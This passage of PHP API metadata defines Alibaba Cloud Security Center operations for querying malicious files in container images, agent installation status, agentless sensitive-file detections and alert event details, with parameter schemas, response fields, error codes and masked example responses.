=> 'image', 'title' => ''], 'required' => false, 'maxItems' => 2, 'title' => '', 'example' => '', ], ], [ 'name' => 'ClusterName', 'in' => 'query', 'schema' => ['description' => 'The name of the cluster.', 'type' => 'string', 'required' => false, 'example' => 'minikube', 'title' => ''], ], [ 'name' => 'ContainerId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container.', 'type' => 'string', 'required' => false, 'example' => 'cc20a1024011c44b6a8710d6f8b****', 'title' => ''], ], [ 'name' => 'Pod', 'in' => 'query', 'schema' => ['description' => 'The pod.', 'type' => 'string', 'required' => false, 'example' => '22222-7xsqq', 'title' => ''], ], [ 'name' => 'Namespace', 'in' => 'query', 'schema' => ['description' => 'The namespace.', 'type' => 'string', 'required' => false, 'example' => 'test-002', 'title' => ''], ], [ 'name' => 'Image', 'in' => 'query', 'schema' => ['description' => 'The name of the container image.', 'type' => 'string', 'required' => false, 'example' => 'registry.cn-wulanchabu.aliyuncs.com/sas_test/huxin-test-001:nuxeo6-****', 'title' => ''], ], [ 'name' => 'Levels', 'in' => 'query', 'schema' => ['description' => 'The severity levels. Separate multiple values with commas (,). Valid values:'."\n" .'* **serious**: urgent'."\n" .'* **suspicious**: suspicious'."\n" .'* **remind**: reminder.', 'type' => 'string', 'required' => false, 'example' => 'serious,suspicious', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The processing status of the malicious image sample. Valid values:'."\n" .'- **0**: unhandled'."\n" .'- **1**: handled'."\n" .'- **2**: verifying'."\n" .'- **3**: added to whitelist.', 'type' => 'string', 'required' => false, 'example' => '0', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'ACF97412-FD09-4D1F-994F-34DF12BREF20', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page when using paging. Minimum value: **1**. Default value: **1**.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page when using paging. Default value: **20**.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of images in which malicious samples are detected.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'Count' => ['description' => 'The number of images with malicious samples returned on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], ], 'title' => '', 'example' => '', ], 'AffectedMaliciousFileImagesResponse' => [ 'description' => 'The list of images in which malicious samples are detected.', 'type' => 'array', 'items' => [ 'description' => 'The information about an image in which malicious samples are detected.', 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The processing status of the malicious image sample. Valid values:'."\n" .'- **0**: unhandled'."\n" .'- **1**: handled'."\n" .'- **2**: verifying'."\n" .'- **3**: added to whitelist.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Digest' => ['description' => 'The digest of the image.', 'type' => 'string', 'example' => '6a5e1031a5858617f7d8a179ead6****', 'title' => ''], 'LatestVerifyTimestamp' => ['description' => 'The timestamp of the latest verification.', 'type' => 'integer', 'format' => 'int64', 'example' => '1596522711000', 'title' => ''], 'RepoInstanceId' => ['description' => 'The instance ID of the container image.', 'type' => 'string', 'example' => 'cri-datvail3m****', 'title' => ''], 'Namespace' => ['description' => 'The namespace of the image repository.', 'type' => 'string', 'example' => 'hanghai-namespace', 'title' => ''], 'Tag' => ['description' => 'The tag of the image.', 'type' => 'string', 'example' => '0.2', 'title' => ''], 'RepoRegionId' => ['description' => 'The region ID of the image repository.', 'type' => 'string', 'example' => 'cn-shanghai', 'title' => ''], 'ImageUuid' => ['description' => 'The UUID of the image.', 'type' => 'string', 'example' => 'e05c0de798217637868ef4****', 'title' => ''], 'FirstScanTimestamp' => ['description' => 'The timestamp of the first scan.', 'type' => 'integer', 'format' => 'int64', 'example' => '1594907349000', 'title' => ''], 'MaliciousMd5' => ['description' => 'The MD5 hash of the malicious file.', 'type' => 'string', 'example' => 'd836968041f768300d9605a****', 'title' => ''], 'FilePath' => ['description' => 'The file path of the image.', 'type' => 'string', 'example' => '/d836968041f7683b5605a****', 'title' => ''], 'RepoId' => ['description' => 'The ID of the image repository.', 'type' => 'string', 'example' => 'crr-vridcl4****', 'title' => ''], 'Layer' => ['description' => 'The layer of the image.', 'type' => 'string', 'example' => '27213ad3447f0209dd152a5cadea****', 'title' => ''], 'LatestScanTimestamp' => ['description' => 'The timestamp of the latest scan.', 'type' => 'integer', 'format' => 'int64', 'example' => '1596522785000', 'title' => ''], 'RepoName' => ['description' => 'The name of the image repository.', 'type' => 'string', 'example' => 'centos', 'title' => ''], 'Level' => ['description' => 'The severity level of the malicious image sample. Valid values:'."\n" .'- **serious**: urgent'."\n" .'- **suspicious**: suspicious'."\n" .'- **remind**: reminder.', 'type' => 'string', 'example' => 'serious', 'title' => ''], 'DownloadUrl' => ['description' => 'The download URL of the malicious sample.', 'type' => 'string', 'example' => 'https://aegis-metadata-file.oss-cn-shanghai.aliyuncs.com/', 'title' => ''], 'HighLight' => ['description' => 'The highlighted text.', 'type' => 'string', 'example' => '{"ruleVersion":"highlight_20210908","ruleId":600106,"events":[[2,54]]}', 'title' => ''], 'ContainerId' => ['description' => 'The ID of the container.', 'type' => 'string', 'example' => '04d20e98c8e2c93b7b864372084320a15a58c8671e53c972ce3a71d9c163****', 'title' => ''], 'Image' => ['description' => 'The name of the image.', 'type' => 'string', 'example' => 'registry.cn-wulanchabu.aliyuncs.com/sas_test/huxin-test-001:nuxeo6-conta****', 'title' => ''], 'Pod' => ['description' => 'The pod.', 'type' => 'string', 'example' => '22222-7xsqq', 'title' => ''], 'ClusterId' => ['description' => 'The ID of the cluster.', 'type' => 'string', 'example' => 'c08d5fc1a329a4b88950a253d082f1****', 'title' => ''], 'ClusterName' => ['description' => 'The name of the cluster.', 'type' => 'string', 'example' => 'docker-law', 'title' => ''], 'InstanceName' => ['description' => 'The name of the server instance.', 'type' => 'string', 'example' => 'sql-test-001', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server.', 'type' => 'string', 'example' => '47.101.XX.XX', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server.', 'type' => 'string', 'example' => '172.22.XX.XX', 'title' => ''], 'TargetId' => ['description' => 'The ID of the scan target.', 'type' => 'string', 'example' => 'm-bp17m0pc0xprzbwo****', 'title' => ''], 'TargetName' => ['description' => 'The name of the scan target.', 'type' => 'string', 'example' => 'source-test-obj-9LaLJ', 'title' => ''], 'TargetType' => ['description' => 'The object type of the scan target. Valid values:'."\n" ."\n" .'- **ECS_IMAGE**: image.'."\n" .'- **ECS_SNAPSHOT**: snapshot.', 'type' => 'string', 'example' => 'ECS_IMAGE', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server.', 'type' => 'string', 'example' => '48a473c4-1650-4931-a822-7e6c2c28****', 'title' => ''], 'Id' => ['description' => 'The ID of the alert event.', 'type' => 'integer', 'format' => 'int64', 'example' => '1000040', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query malicious file details in container images', 'summary' => 'Queries the details of malicious files detected in container images.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAffectedMaliciousFileImages'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeAffectedMaliciousFileImages', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"ACF97412-FD09-4D1F-994F-34DF12BREF20\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 2,\\n \\"Count\\": 2\\n },\\n \\"AffectedMaliciousFileImagesResponse\\": [\\n {\\n \\"Status\\": 1,\\n \\"Digest\\": \\"6a5e1031a5858617f7d8a179ead6****\\",\\n \\"LatestVerifyTimestamp\\": 1596522711000,\\n \\"RepoInstanceId\\": \\"cri-datvail3m****\\",\\n \\"Namespace\\": \\"hanghai-namespace\\",\\n \\"Tag\\": \\"0.2\\",\\n \\"RepoRegionId\\": \\"cn-shanghai\\",\\n \\"ImageUuid\\": \\"e05c0de798217637868ef4****\\",\\n \\"FirstScanTimestamp\\": 1594907349000,\\n \\"MaliciousMd5\\": \\"d836968041f768300d9605a****\\",\\n \\"FilePath\\": \\"/d836968041f7683b5605a****\\",\\n \\"RepoId\\": \\"crr-vridcl4****\\",\\n \\"Layer\\": \\"27213ad3447f0209dd152a5cadea****\\",\\n \\"LatestScanTimestamp\\": 1596522785000,\\n \\"RepoName\\": \\"centos\\",\\n \\"Level\\": \\"serious\\",\\n \\"DownloadUrl\\": \\"https://aegis-metadata-file.oss-cn-shanghai.aliyuncs.com/\\",\\n \\"HighLight\\": \\"{\\\\\\"ruleVersion\\\\\\":\\\\\\"highlight_20210908\\\\\\",\\\\\\"ruleId\\\\\\":600106,\\\\\\"events\\\\\\":[[2,54]]}\\",\\n \\"ContainerId\\": \\"04d20e98c8e2c93b7b864372084320a15a58c8671e53c972ce3a71d9c163****\\",\\n \\"Image\\": \\"registry.cn-wulanchabu.aliyuncs.com/sas_test/huxin-test-001:nuxeo6-conta****\\",\\n \\"Pod\\": \\"22222-7xsqq\\",\\n \\"ClusterId\\": \\"c08d5fc1a329a4b88950a253d082f1****\\",\\n \\"ClusterName\\": \\"docker-law\\",\\n \\"InstanceName\\": \\"sql-test-001\\",\\n \\"InternetIp\\": \\"47.101.XX.XX\\",\\n \\"IntranetIp\\": \\"172.22.XX.XX\\",\\n \\"TargetId\\": \\"m-bp17m0pc0xprzbwo****\\",\\n \\"TargetName\\": \\"source-test-obj-9LaLJ\\",\\n \\"TargetType\\": \\"ECS_IMAGE\\",\\n \\"Uuid\\": \\"48a473c4-1650-4931-a822-7e6c2c28****\\",\\n \\"Id\\": 1000040\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeAgentInstallStatus' => [ 'summary' => 'Queries the Agent installation status after an Agent installation command is run by using Cloud Assistant. This operation supports querying the installation status only for installations initiated within the last 2 minutes.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '121015', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '59.46.XXX.XXX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Valid values:'."\n" .'- **zh**: Chinese.'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Uuids', 'in' => 'query', 'schema' => ['description' => 'The UUIDs of the servers to query. Separate multiple UUIDs with commas (,).'."\n" .'> You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain the UUIDs of servers.', 'type' => 'string', 'required' => true, 'example' => 'inet-eae014a7-16c4-4d4e-9f03-5208f4dc****,inet-eae047da-1e5a-41ce-828d-47606e9b****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'A4EB8B1C-1DEC-5E18-BCD0-D1BBB3936FA7', 'title' => ''], 'AegisClientInvokeStatusResponseList' => [ 'description' => 'The list of server statuses.', 'type' => 'array', 'items' => [ 'description' => 'The server status.', 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The UUID of the server.', 'type' => 'string', 'example' => 'd123f6ae-9749-4338-8c7f-3c2c1ead****', 'title' => ''], 'Message' => ['description' => 'The message returned for the request result.', 'type' => 'string', 'example' => 'uninstalled', 'title' => ''], 'Result' => ['description' => 'The status result. Valid values:'."\n" ."\n" .'- **-1**: not installed'."\n" .'- **0**: installing'."\n" .'- **1**: installed'."\n" .'- **2**: installation failed.', 'type' => 'integer', 'format' => 'int32', 'example' => '-1', 'title' => ''], 'ResuleCode' => ['description' => 'The status code. Valid values:'."\n" .'- **-1**: Not installed.'."\n" .'- **0**: Installed.'."\n" .'- **1**: Failed to create the client directory.'."\n" .'- **2**: Failed to download the installation package.'."\n" .'- **3**: The installation file does not exist.'."\n" .'- **4**: The installation file verification information does not exist.'."\n" .'- **5**: The installation file failed verification.'."\n" .'- **6**: Failed to execute the installation file.'."\n" .'- **7**: Installation failed due to insufficient permissions.'."\n" .'- **8**: The client process was not detected.'."\n" .'- **100**: Installation failed due to an unknown error.'."\n" .'- **1001**: Installation failed. One-click client installation is not supported in this region.'."\n" .'- **1002**: Installation failed. Non-cloud hosts are not supported. Run the installation script on the server.'."\n" .'- **1003**: Installation failed. The operating system type is not supported.'."\n" .'- **1004**: Internal error. Try again later.'."\n" .'- **1005**: The ECS instance is not running. Start the ECS instance and try again.'."\n" .'- **1006**: One-click client installation is not supported for ECS instances in the classic network.'."\n" .'- **1007**: The command process was manually stopped.'."\n" .'- **1008**: Cloud Assistant is not installed. The client cannot be installed.'."\n" .'- **1009**: Command execution timed out. Try again later.'."\n" .'- **1010**: The server is already online. Client installation is not required.', 'type' => 'string', 'example' => '-1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'InternalError', 'errorMessage' => 'The request processing has failed due to some unknown error.', 'description' => ''], ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query agent installation status', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAgentInstallStatus'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeAgentInstallStatus', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"A4EB8B1C-1DEC-5E18-BCD0-D1BBB3936FA7\\",\\n \\"AegisClientInvokeStatusResponseList\\": [\\n {\\n \\"Uuid\\": \\"d123f6ae-9749-4338-8c7f-3c2c1ead****\\",\\n \\"Message\\": \\"uninstalled\\",\\n \\"Result\\": -1,\\n \\"ResuleCode\\": \\"-1\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeAgentlessSensitiveFileByKey' => [ 'methods' => ['get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '225179', 'abilityTreeNodes' => ['FEATUREsasON13NY'], ], 'parameters' => [ [ 'name' => 'SensitiveFileKey', 'in' => 'query', 'schema' => ['description' => 'The type of the sensitive file.', 'type' => 'string', 'required' => false, 'docRequired' => true, 'example' => 'sshpasswd', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The fix status of the baseline risk. Valid values:'."\n" .'- **0**: unfixed'."\n" .'- **1**: fixed.', 'type' => 'string', 'required' => false, 'example' => '0', 'title' => ''], ], [ 'name' => 'InstanceId', 'in' => 'query', 'schema' => ['description' => 'The instance ID of the asset to query. You can obtain this value from Node Management > Details > Detection Objects.', 'type' => 'string', 'required' => false, 'example' => 'i-bp1fu4aqltf1huhc****', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The asset name or IP address.', 'type' => 'string', 'required' => false, 'example' => '1.2.XX.XX', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page in a paging query. Default value: 20. If you leave this parameter empty, 20 entries are returned per page.'."\n" .'> Do not leave PageSize empty.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '50', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return. Default value: **1**.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'ScanRange', 'in' => 'query', 'style' => 'json', 'schema' => [ 'description' => 'The collection of scan ranges.', 'type' => 'array', 'items' => ['description' => 'The scan range. Valid values:'."\n" ."\n" .'- **agentless_image**: host image.'."\n" .'- **agentless_snapshot**: host snapshot.'."\n" .'- **ecs_image**: custom image.'."\n" .'- **ecs_snapshot**: user snapshot.', 'type' => 'string', 'required' => false, 'example' => 'agentless_image', 'title' => ''], 'required' => false, 'title' => '', 'example' => '', ], ], [ 'name' => 'ImageUuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the asset to scan. You can obtain this value from the Host Assets and Cloud Products page. In host security detection scenarios, this parameter specifies the UUID of the host to scan. In snapshot security detection and custom image security detection scenarios, this parameter specifies the ID of the image or snapshot to scan.', 'type' => 'string', 'required' => false, 'example' => '06293273b67d19516cfcc712194f****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'FBBEB173-1F43-505F-A876-C03ECDF6CE4C'], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries per page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'Count' => ['description' => 'The total number of entries on the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], 'SensitiveFileList' => [ 'description' => 'The sensitive file information detected by the agentless detection feature.', 'type' => 'array', 'items' => [ 'description' => 'The sensitive file information detected by the agentless detection feature.', 'type' => 'object', 'properties' => [ 'SensitiveFileKey' => ['description' => 'The type of the sensitive file.', 'type' => 'string', 'example' => 'pem', 'title' => ''], 'RiskLevel' => [ 'description' => 'The risk level. Valid values:'."\n" ."\n" .'- **high**: high risk.'."\n" .'- **medium**: medium risk.'."\n" .'- **low**: low risk.', 'enumValueTitles' => [], 'type' => 'string', 'example' => 'high', 'title' => '', ], 'InternetIp' => ['description' => 'The public IP address of the asset detected by the agentless detection feature.', 'type' => 'string', 'example' => '95.214.XX.XX', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the asset detected by the agentless detection feature.', 'type' => 'string', 'example' => '10.68.XX.XX', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the asset detected by the agentless detection feature.', 'type' => 'string', 'example' => '73e6a851-e63b-49ef-9d7a-5542d765****', 'title' => ''], 'TargetName' => ['description' => 'The name of the scan target for the agentless detection feature.', 'type' => 'string', 'example' => 'SAS_Agentless_171869952****', 'title' => ''], 'Status' => ['description' => 'The status of the sensitive file. Valid values:'."\n" .'- **0**: unhandled.'."\n" .'- **1**: ignored.'."\n" .'- **2**: false positive.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'InstanceName' => ['description' => 'The instance name of the asset detected by the agentless detection feature.', 'type' => 'string', 'example' => 'test-server', 'title' => ''], 'FirstScanTime' => ['description' => 'The timestamp of the first scan. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1663321552000', 'title' => ''], 'LastScanTime' => ['description' => 'The timestamp of the most recent scan. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1663691592000', 'title' => ''], 'Md5' => ['description' => 'The MD5 hash of the sensitive file.', 'type' => 'string', 'example' => 'b484b0dff093f358897486b58266****', 'title' => ''], 'FilePath' => ['description' => 'The path of the sensitive file.', 'type' => 'string', 'example' => '/usr/lib/abc.txt', 'title' => ''], 'Prompt' => ['description' => 'The content of the sensitive file.', 'type' => 'string', 'example' => 'mysql -u -p****', 'title' => ''], 'Id' => ['description' => 'The ID of the sensitive file alert.', 'type' => 'integer', 'format' => 'int64', 'example' => '423505573', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" .'- **true**: successful.'."\n" .'- **false**: failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Query sensitive file alerts by type', 'summary' => 'Retrieves the list of assets that contain a specific type of sensitive file detected by the agentless detection feature.', 'description' => 'Only Alibaba Cloud accounts that have activated the pay-as-you-go billing method for the agentless detection feature of Security Center can call this operation.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAgentlessSensitiveFileByKey'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeAgentlessSensitiveFileByKey', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"FBBEB173-1F43-505F-A876-C03ECDF6CE4C\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 100,\\n \\"Count\\": 20\\n },\\n \\"SensitiveFileList\\": [\\n {\\n \\"SensitiveFileKey\\": \\"pem\\",\\n \\"RiskLevel\\": \\"high\\",\\n \\"InternetIp\\": \\"95.214.XX.XX\\",\\n \\"IntranetIp\\": \\"10.68.XX.XX\\",\\n \\"Uuid\\": \\"73e6a851-e63b-49ef-9d7a-5542d765****\\",\\n \\"TargetName\\": \\"SAS_Agentless_171869952****\\",\\n \\"Status\\": 0,\\n \\"InstanceName\\": \\"test-server\\",\\n \\"FirstScanTime\\": 1663321552000,\\n \\"LastScanTime\\": 1663691592000,\\n \\"Md5\\": \\"b484b0dff093f358897486b58266****\\",\\n \\"FilePath\\": \\"/usr/lib/abc.txt\\",\\n \\"Prompt\\": \\"mysql -u -p****\\",\\n \\"Id\\": 423505573\\n }\\n ],\\n \\"Success\\": true\\n}","type":"json"}]', ], 'DescribeAlarmEventDetail' => [ 'summary' => 'Queries the details about an alert event. An alert event consists of an alert and exceptions. Each alert event is associated with multiple exceptions.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas731ZAS'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '192.168.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'AlarmUniqueInfo', 'in' => 'query', 'schema' => ['description' => 'The unique identifier of the alert event.'."\n" ."\n" .'> To query the details of an alert event, you must provide the unique identifier of the alert event. You can call the [DescribeSuspEvents](~~DescribeSuspEvents~~) operation to obtain the identifier.'."\n", 'type' => 'string', 'required' => true, 'example' => '9f62555666f177aa84ee1eaf465a****', 'title' => ''], ], [ 'name' => 'From', 'in' => 'query', 'schema' => ['description' => 'The ID of the request source. Set the value to **sas**.'."\n", 'type' => 'string', 'required' => true, 'example' => 'sas', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '7EA50837-2F0B-5BCC-AB61-4968D88D75AD', 'title' => ''], 'Data' => [ 'description' => 'The details of the alert event.'."\n", 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The alert type of the alert event. Valid values:'."\n" ."\n" .'* Suspicious process'."\n" .'* Webshell'."\n" .'* Unusual logon'."\n" .'* Exception'."\n" .'* Sensitive file tampering'."\n" .'* Malicious process (cloud threat detection)'."\n" .'* Suspicious network connection'."\n" .'* Other'."\n" .'* Abnormal account'."\n" .'* Application intrusion event'."\n" .'* Cloud threat detection'."\n" .'* Precise defense'."\n" .'* Application whitelist'."\n" .'* Persistent webshell'."\n" .'* Web application threat detection'."\n" .'* Malicious script'."\n" .'* Threat intelligence'."\n" .'* Malicious network activity'."\n" .'* Cluster exception'."\n" .'* Webshell (on-premises threat detection)'."\n" .'* Vulnerability exploitation'."\n" .'* Malicious process (on-premises threat detection)'."\n" .'* Trusted exception'."\n", 'type' => 'string', 'example' => 'Webshell', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the associated instance.'."\n", 'type' => 'string', 'example' => '172.16.XX.XX', 'title' => ''], 'K8sClusterName' => ['description' => 'The name of the Kubernetes cluster.'."\n", 'type' => 'string', 'example' => 'TestK8sCluser', 'title' => ''], 'ContainerImageId' => ['description' => 'The ID of the image to which the container belongs.'."\n", 'type' => 'string', 'example' => 'cadb7a725641', 'title' => ''], 'AlarmEventDesc' => ['description' => 'The description of the alert event.'."\n", 'type' => 'string', 'example' => 'The detection model finds that self-mutation is running on your server. A self-mutation Trojan is a Trojan horse program with self-mutation function. It will change its hash or copy a large number of itself to different paths, and run in the background to avoid cleaning.', 'title' => ''], 'AlarmUniqueInfo' => ['description' => 'The unique identifier of the alert event.'."\n" ."\n" .'> To query the details of an alert event, you must provide the unique identifier of the alert event. You can call the [DescribeSuspEvents](~~DescribeSuspEvents~~) operation to obtain the identifier.'."\n", 'type' => 'string', 'example' => '9f62555666f177aa84ee1eaf465a****', 'title' => ''], 'CanCancelFault' => ['description' => 'Indicates whether you can cancel marking the alert event as a false positive. Valid values:'."\n" ."\n" .'* **true**: yes'."\n" .'* **false**: no'."\n", 'type' => 'boolean', 'example' => 'false', 'title' => ''], 'AppName' => ['description' => 'The name of the container application.'."\n", 'type' => 'string', 'example' => 'app:msdp-uat-service', 'title' => ''], 'CanBeDealOnLine' => ['description' => 'Indicates whether the online handling of the alert event is supported. Valid values:'."\n" ."\n" .'* **true**: yes'."\n" .'* **false**: no'."\n", 'type' => 'boolean', 'example' => 'false', 'title' => ''], 'ContainerImageName' => ['description' => 'The name of the image to which the container belongs.'."\n", 'type' => 'string', 'example' => 'jenkins/jenkins:latest', 'title' => ''], 'K8sClusterId' => ['description' => 'The ID of the Kubernetes cluster.'."\n", 'type' => 'string', 'example' => 'c562cf0d68e9749ee9fe544a7ab2f****', 'title' => ''], 'ContainHwMode' => ['description' => 'Indicates whether the Safeguard Mode For Major Activities mode is enabled.'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'InstanceName' => ['description' => 'The name of the instance.'."\n", 'type' => 'string', 'example' => 'i-wz92q7m5hsbgfhdss***', 'title' => ''], 'K8sNodeId' => ['description' => 'The ID of the Kubernetes cluster node.'."\n", 'type' => 'string', 'example' => 'i-bp14a1ay8e0aa9t0l***', 'title' => ''], 'Solution' => ['description' => 'The solution to the alert event.'."\n", 'type' => 'string', 'example' => 'An invalid logon source IP has been detected. If you recognize this logon attempt, we recommend that you add the current logon source IP to the valid logon source IP list to avoid future alerts. If you do not recognize this logon attempt, we recommend that you modify the password.', 'title' => ''], 'DataSource' => ['description' => 'The data source of the alert event.'."\n", 'type' => 'string', 'example' => 'aegis_***', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the associated instance.'."\n", 'type' => 'string', 'example' => '172.25.30.**', 'title' => ''], 'AlarmEventAliasName' => ['description' => 